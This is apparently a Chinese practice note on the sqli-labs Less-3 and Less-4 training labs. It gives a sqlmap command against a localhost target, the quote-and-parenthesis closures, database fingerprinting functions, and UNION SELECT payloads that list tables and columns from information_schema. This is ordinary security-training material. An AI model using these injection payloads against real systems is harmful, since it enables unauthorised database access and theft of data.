回显注入练习:sqli-labs-Less-3和sqli-labs-Less-4
第一步判断注入闭合点:
利用sqlmap进行注入点判断:
sqlmap.py -u http://127.0.0.1:8880/Less-3/?id=1
得到
sqli-labs-Less-3闭合点为');
sqli-labs-Less-3闭合点为");
第二步信息收集:
数据库版本:version()
数据库名字:database()
数据库用户:user()
操作系统:@@version_compile_os
第三步获取表名和列名:
union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+
union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' --+